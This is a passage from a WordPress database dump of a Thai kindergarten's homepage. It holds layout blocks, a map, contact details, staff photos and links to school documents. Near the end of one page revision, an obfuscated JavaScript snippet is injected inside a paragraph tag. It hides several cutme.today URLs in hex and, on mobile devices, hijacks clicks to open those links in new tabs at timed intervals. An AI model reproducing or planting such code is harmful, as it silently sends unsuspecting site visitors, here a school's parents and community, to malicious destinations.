{\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 14:40:31','2025-06-27 07:40:31','',19,'http://watprato.ssk.in.th/?p=561',0,'revision','',0),
(563,1,'2025-06-27 14:44:11','2025-06-27 07:44:11','','483858906_122214558428202781_582783627217107479_n','','inherit','open','closed','','483858906_122214558428202781_582783627217107479_n','','','2025-06-27 14:44:11','2025-06-27 07:44:11','',19,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n.jpg',0,'attachment','image/jpeg',0),
(564,1,'2025-06-27 14:44:19','2025-06-27 07:44:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 